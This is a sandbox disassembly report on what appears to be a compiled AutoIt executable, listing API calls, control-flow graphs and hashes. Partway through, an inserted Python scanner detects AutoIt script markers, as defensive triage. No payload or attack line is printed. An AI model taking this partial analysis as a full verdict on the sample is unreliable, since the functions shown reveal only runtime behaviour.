                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                            • LoadIconW.USER32(000000A9), ref: 002734C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: c64db924f2b2db344bc3102308e171ae2ea4c58ec50a32ea33119241a855afa1
                                                                            • Instruction ID: 189411d0b449f663eb123fff44975e00c9005d82e91a9e08f3fe09f01517aef4
                                                                            • Opcode Fuzzy Hash: c64db924f2b2db344bc3102308e171ae2ea4c58ec50a32ea33119241a855afa1
                                                                            • Instruction Fuzzy Hash: 1921E3B1905308AFEB129FA4EC89BDEBBF8FB08710F00411AF914AA2A0D7B51544CF91

                                                                            APIs
                                                                              • Part of subcall function 002900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00283094), ref: 002900ED
                                                                              • Part of subcall function 002908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0028309F), ref: 002908E3
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002830E2
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002C01BA
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002C01FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 002C0239
                                                                            • _wcscat.LIBCMT ref: 002C0292
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: fe033e90f1453ba7356cbd56a439dc8cf10fa889080c204046b4979d124c4029
                                                                            • Instruction ID: 82067fa29f640d7d318b9e08bd48000d4a2db2722ccd9412970319d89c5b298a
                                                                            • Opcode Fuzzy Hash: fe033e90f1453ba7356cbd56a439dc8cf10fa889080c204046b4979d124c4029
                                                                            • Instruction Fuzzy Hash: 82715B7542A7019EC706EF25E8919ABBBACFF48340F40092EF845C31A0EF309969CF52

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00285156
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00285165
                                                                            • LoadIconW.USER32(00000063), ref: 0028517C
                                                                            • LoadIconW.USER32(000000A4), ref: 0028518E
                                                                            • LoadIconW.USER32(000000A2), ref: 002851A0
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002851C6
                                                                            • RegisterClassExW.USER32(?), ref: 0028521C
                                                                              • Part of subcall function 00273411: GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                              • Part of subcall function 00273411: RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                              • Part of subcall function 00273411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                              • Part of subcall function 00273411: InitCommonControlsEx.COMCTL32(?), ref: 0027349C
                                                                              • Part of subcall function 00273411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                              • Part of subcall function 00273411: LoadIconW.USER32(000000A9), ref: 002734C2
                                                                              • Part of subcall function 00273411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: ed372400cd257b86ae7cad0c61a5a73b8fe5386cd696dccacf5f33f60d0e0ef6
                                                                            • Instruction ID: 17d206411c7bfbe41fe40054f1cb92ca7cb5cef0562836ab32c173d1eff40523
                                                                            • Opcode Fuzzy Hash: ed372400cd257b86ae7cad0c61a5a73b8fe5386cd696dccacf5f33f60d0e0ef6
                                                                            • Instruction Fuzzy Hash: 6C217CB0D15309AFEB22DFA4ED99B9E7BB8FB08710F00051AF504A62A1C7B65950DF84

                                                                            Control-flow Graph

                                                                            control_flow_graph 926 2e5e1d-2e5e54 call 274dc0 929 2e5e56-2e5e63 call 27502b 926->929 930 2e5e74-2e5e86 WSAStartup 926->930 929->930 939 2e5e65-2e5e70 call 27502b 929->939 931 2e5e9d-2e5edb call 2840cd call 274d37 call 28402a inet_addr gethostbyname 930->931 932 2e5e88-2e5e98 call 2c7135 930->932 947 2e5eec-2e5efc call 2c7135 931->947 948 2e5edd-2e5eea IcmpCreateFile 931->948 940 2e5ff6-2e5ffe 932->940 939->930 953 2e5fed-2e5ff1 call 281cb6 947->953 948->947 949 2e5f01-2e5f32 call 290fe6 call 28433f 948->949 958 2e5f34-2e5f53 IcmpSendEcho 949->958 959 2e5f55-2e5f69 IcmpSendEcho 949->959 953->940 960 2e5f6d-2e5f6f 958->960 959->960 961 2e5fa2-2e5fa4 960->961 962 2e5f71-2e5f76 960->962 963 2e5fa6-2e5fb2 call 2c7135 961->963 964 2e5fba-2e5fcc call 274dc0 962->964 965 2e5f78-2e5f7d 962->965 973 2e5fd4-2e5fe8 IcmpCloseHandle WSACleanup call 2845ae 963->973 974 2e5fce-2e5fd0 964->974 975 2e5fd2 964->975 968 2e5f7f-2e5f84 965->968 969 2e5fb4-2e5fb8 965->969 968->961 972 2e5f86-2e5f8b 968->972 969->963 976 2e5f8d-2e5f92 972->976 977 2e5f9a-2e5fa0 972->977 973->953 974->973 975->973 976->969 979 2e5f94-2e5f98 976->979 977->963 979->963
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 002E5E7E
                                                                            • inet_addr.WSOCK32(?,?,?), ref: 002E5EC3
                                                                            • gethostbyname.WS2_32(?), ref: 002E5ECF
                                                                            • IcmpCreateFile.IPHLPAPI ref: 002E5EDD
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002E5F4D
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002E5F63
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002E5FD8
                                                                            • WSACleanup.WSOCK32 ref: 002E5FDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: c35a007e2c95bc1bfd4fe89e16077f84835f7cdd7aa35d2e0f0924e502d66da2
                                                                            • Instruction ID: 870e950a83af53b4619b2843336841b33a23f8b5aa09de414cbdc92d83ca8a00
                                                                            • Opcode Fuzzy Hash: c35a007e2c95bc1bfd4fe89e16077f84835f7cdd7aa35d2e0f0924e502d66da2
                                                                            • Instruction Fuzzy Hash: E251EC306646119FCB21EF21CC49B2AB7E4EF49714F048529F999DB2A1DB70ED20CF42

                                                                            Control-flow Graph

                                                                            control_flow_graph 980 284d83-284dd1 982 284e31-284e33 980->982 983 284dd3-284dd6 980->983 982->983 986 284e35 982->986 984 284dd8-284ddf 983->984 985 284e37 983->985 987 284ead-284eb5 PostQuitMessage 984->987 988 284de5-284dea 984->988 990 284e3d-284e40 985->990 991 2c09c2-2c09f0 call 27c460 call 27c483 985->991 989 284e1a-284e22 DefWindowProcW 986->989 998 284e61-284e63 987->998 994 284df0-284df2 988->994 995 2c0a35-2c0a49 call 2d2cce 988->995 997 284e28-284e2e 989->997 992 284e42-284e43 990->992 993 284e65-284e8c SetTimer RegisterWindowMessageW 990->993 1027 2c09f5-2c09fc 991->1027 999 284e49-284e5c KillTimer call 285ac3 call 2734e4 992->999 1000 2c0965-2c0968 992->1000 993->998 1001 284e8e-284e99 CreatePopupMenu 993->1001 1002 284df8-284dfd 994->1002 1003 284eb7-284ec1 call 285b29 994->1003 995->998 1020 2c0a4f 995->1020 998->997 999->998 1006 2c099e-2c09bd MoveWindow 1000->1006 1007 2c096a-2c096c 1000->1007 1001->998 1009 2c0a1a-2c0a21 1002->1009 1010 284e03-284e08 1002->1010 1022 284ec6 1003->1022 1006->998 1014 2c098d-2c0999 SetFocus 1007->1014 1015 2c096e-2c0971 1007->1015 1009->989 1017 2c0a27-2c0a30 call 2c8854 1009->1017 1018 284e9b-284eab call 285bd7 1010->1018 1019 284e0e-284e14 1010->1019 1014->998 1015->1019 1023 2c0977-2c0988 call 27c460 1015->1023 1017->989 1018->998 1019->989 1019->1027 1020->989 1022->998 1023->998 1027->989 1031 2c0a02-2c0a15 call 285ac3 call 2859d3 1027->1031 1031->989
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00284E22
                                                                            • KillTimer.USER32(?,00000001), ref: 00284E4C
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00284E6F
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00284E7A
                                                                            • CreatePopupMenu.USER32 ref: 00284E8E
                                                                            • PostQuitMessage.USER32(00000000), ref: 00284EAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: efe273954a3ec6fd6f70fdd713875f160d7f2b0bb216f7a78c52907b649bc3e7
                                                                            • Instruction ID: 592f737e9c94abad2307b07b9ba3ba42b3559257410d958d2dcc7824863d7a3e
                                                                            • Opcode Fuzzy Hash: efe273954a3ec6fd6f70fdd713875f160d7f2b0bb216f7a78c52907b649bc3e7
                                                                            • Instruction Fuzzy Hash: B741197923620BABDB3A7F68DC89B7A3699F741301F00061AF501D11E2CBB49C70D761

                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C0C5B
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _memset.LIBCMT ref: 00285787
                                                                            • _wcscpy.LIBCMT ref: 002857DB
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002857EB
                                                                            • __swprintf.LIBCMT ref: 002C0CD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                            • String ID: Line %d: $AutoIt - $E#E#
                                                                            • API String ID: 230667853-1317277412
                                                                            • Opcode ID: 66255e1b2805d25a42fc124aa3d3b4e4d88efd99c464f92390a52313be39dbf4
                                                                            • Instruction ID: 979f4b87deaabb29a5d2f27bc1124d569dd06c51bcf36b8d0714fa078eeb979e
                                                                            • Opcode Fuzzy Hash: 66255e1b2805d25a42fc124aa3d3b4e4d88efd99c464f92390a52313be39dbf4
                                                                            • Instruction Fuzzy Hash: 8341B57102A311AAD321FB60DC85FDFB7DCAF44350F004A1EF585920E1DB70A669CB56

                                                                            APIs
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002907EC
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002907F4
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002907FF
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0029080A
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00290812
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0029081A
                                                                              • Part of subcall function 0028FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0027AC6B), ref: 0028FFA7
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0027AD08
                                                                            • OleInitialize.OLE32(00000000), ref: 0027AD85
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002B2F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: <w3$\t3$s3
                                                                            • API String ID: 1986988660-356518367
                                                                            • Opcode ID: 2e40fd0335e04bf208d74384df5045d74dcd0edca418b7bde7895de9f659cfb8
                                                                            • Instruction ID: 9fdbed3c90d7b0eb7e992f42bb268b4c8e84c3ada135c4511657ce82facaa95b
                                                                            • Opcode Fuzzy Hash: 2e40fd0335e04bf208d74384df5045d74dcd0edca418b7bde7895de9f659cfb8
                                                                            • Instruction Fuzzy Hash: B781DBF89192448ED3BBEF2AADD52657FECEB59314F00816AE418C72B2EB306415DF50

Control-flow Graph

                                                                            control_flow_graph 1315 2850db-28514b CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00285109
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0028512A
                                                                            • ShowWindow.USER32(00000000), ref: 0028513E
                                                                            • ShowWindow.USER32(00000000), ref: 00285147
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 3e425c7a13e4944ac2693a78a296fc3258b75d8d8343b11b2d9472d1443a5415
                                                                            • Instruction ID: 91a4d17d05771b2c85ee76af2f2b0640ce127efb2072b8c3eceffbb3b6a603ab
                                                                            • Opcode Fuzzy Hash: 3e425c7a13e4944ac2693a78a296fc3258b75d8d8343b11b2d9472d1443a5415
                                                                            • Instruction Fuzzy Hash: E9F0DAB16452947EEA73172BAC98F772E7DD7C6F60F00051AB900E21B1CA651851DAB0

                                                                            Control-flow Graph

                                                                            control_flow_graph 1316 2d9b16-2d9b9b call 284a8c call 2d9cf1 1321 2d9b9d 1316->1321 1322 2d9ba5-2d9c31 call 284ab2 * 4 call 284a8c call 29593c * 2 call 284ab2 1316->1322 1323 2d9b9f-2d9ba0 1321->1323 1340 2d9c36-2d9c5c call 2d96c4 call 2d8f0e 1322->1340 1325 2d9ce8-2d9cee 1323->1325 1345 2d9c5e-2d9c6e call 292f85 * 2 1340->1345 1346 2d9c73-2d9c77 1340->1346 1345->1323 1348 2d9c79-2d9cd6 call 2d90c1 call 292f85 1346->1348 1349 2d9cd8-2d9cde call 292f85 1346->1349 1356 2d9ce0-2d9ce6 1348->1356 1349->1356 1356->1325
                                                                            APIs
                                                                              • Part of subcall function 00284A8C: _fseek.LIBCMT ref: 00284AA4
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DE1
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DF4
                                                                            • _free.LIBCMT ref: 002D9C5F
                                                                            • _free.LIBCMT ref: 002D9C66
                                                                            • _free.LIBCMT ref: 002D9CD1
                                                                              • Part of subcall function 00292F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292F99
                                                                              • Part of subcall function 00292F85: GetLastError.KERNEL32(00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292FAB
                                                                            • _free.LIBCMT ref: 002D9CD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                            • API String ID: 1552873950-2806939583
                                                                            • Opcode ID: efd58b78825c51bee218a88d1fc1416342d6ab64515e348a60f4a4119548d964
                                                                            • Instruction ID: 4a93d9c74390e8f7be6339ed6f64129e8bc47ab669e8c246505e92c1e9cfd485
                                                                            • Opcode Fuzzy Hash: efd58b78825c51bee218a88d1fc1416342d6ab64515e348a60f4a4119548d964
                                                                            • Instruction Fuzzy Hash: 5D513CB1924219AFDF24EF64DC41A9EBBB9FF48304F10009EB249A7381DB715E948F58
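The function above is the AutoIt runtime locating its embedded script: it seeks through its own image (_fseek) and compares wide strings (_wcscmp) against the marker ">>>AUTOIT SCRIPT<<<", and other functions on this page register the "AutoIt v3" window class. Those two strings are a quick triage check for whether a dropped executable or a process memory dump is a compiled AutoIt stub. The scanner below is an added example written for this report; it is not Joe Sandbox or AutoIt code. It searches a byte buffer for the two markers the disassembly shows, in both UTF-16LE (how the runtime compares them) and ASCII, and the sample buffer it builds is constructed test data, not bytes from the analysed sample.

```python
import sys

# Marker strings taken from the disassembly on this page: the embedded-script
# header the runtime compares with _wcscmp, and the window class/title string.
MARKERS = (">>>AUTOIT SCRIPT<<<", "AutoIt v3")


def _needles(marker):
    """Return the marker in the two encodings a compiled AutoIt stub may carry."""
    return {
        "utf-16le": marker.encode("utf-16-le"),   # how the runtime itself compares it
        "ascii": marker.encode("ascii"),          # how it often appears in resources
    }


def find_autoit_markers(data):
    """Locate every occurrence of the known markers in a byte buffer.

    Returns a list of dicts {marker, encoding, offset}, sorted by offset, so a
    hit can be mapped straight back to a file offset or dump RVA.
    """
    hits = []
    for marker in MARKERS:
        for encoding, needle in _needles(marker).items():
            start = 0
            while True:
                idx = data.find(needle, start)
                if idx < 0:
                    break
                hits.append({"marker": marker, "encoding": encoding, "offset": idx})
                start = idx + 1
    return sorted(hits, key=lambda h: h["offset"])


def is_probably_autoit(data):
    """True when the embedded-script marker is present in either encoding."""
    return any(h["marker"] == ">>>AUTOIT SCRIPT<<<" for h in find_autoit_markers(data))


def build_sample():
    """Constructed test input (not a real sample): a fake MZ header followed by
    the ASCII window-class string and the UTF-16LE script marker."""
    blob = bytearray(b"MZ" + b"\x00" * 62)            # 64-byte stub header
    blob += b"AutoIt v3\x00"                          # ASCII, at offset 64
    blob += b"\x00" * 16
    blob += ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") # UTF-16LE, at offset 90
    blob += b"\x00" * 8
    return bytes(blob)


def scan_file(path):
    """Scan a file on disk (dropped PE, or a .sdmp memory dump) and report hits."""
    with open(path, "rb") as fh:
        data = fh.read()
    return find_autoit_markers(data)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = scan_file(target) if target else find_autoit_markers(build_sample())
    for h in hits:
        print(f"0x{h['offset']:08x}  {h['encoding']:8s}  {h['marker']}")
    print("AutoIt stub:", "likely" if any(h["marker"] == MARKERS[0] for h in hits) else "no marker")
```

Run it against the dropped .exe or against one of the .sdmp memory dumps listed under Memory Dump Source; an offset for the UTF-16LE ">>>AUTOIT SCRIPT<<<" hit is the point from which the compiled script resource can be carved for decompilation. Absence of both markers does not clear a file, since a packer can wrap the stub, but their presence in a process dump is a strong indication that the process is an AutoIt interpreter running an embedded script.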
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                            • Instruction ID: eb1cb1bf2ee01d78c292c0f408d7bcd32316bfa70e075a00c97f52a2779d73cf
                                                                            • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                            • Instruction Fuzzy Hash: D551A930B20B16DBDF259FA9C8806AEB7A5AF41320F24872DF835962D0D7709E719F40
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0027534A
                                                                            • TranslateMessage.USER32(?), ref: 00275356
                                                                            • DispatchMessageW.USER32(?), ref: 00275360
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID:
                                                                            • API String ID: 1795658109-0
                                                                            • Opcode ID: 81d7cc7ee84b04e3003960f9cb2dfed84f6063bd7b62343d75fa4df369ae1860
                                                                            • Instruction ID: 9e769b7b1d3fc338ed719fe94e5cebc5aba875757c0ed17c34acd18bdfa55466
                                                                            • Opcode Fuzzy Hash: 81d7cc7ee84b04e3003960f9cb2dfed84f6063bd7b62343d75fa4df369ae1860
                                                                            • Instruction Fuzzy Hash: F5310A70528B169FDB318F64DC84BBAB7EC9B01340F14809AE41AC75F1D7F59455D711
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712A8
                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712C9
                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712EB
                                                                            Memory Dump Source
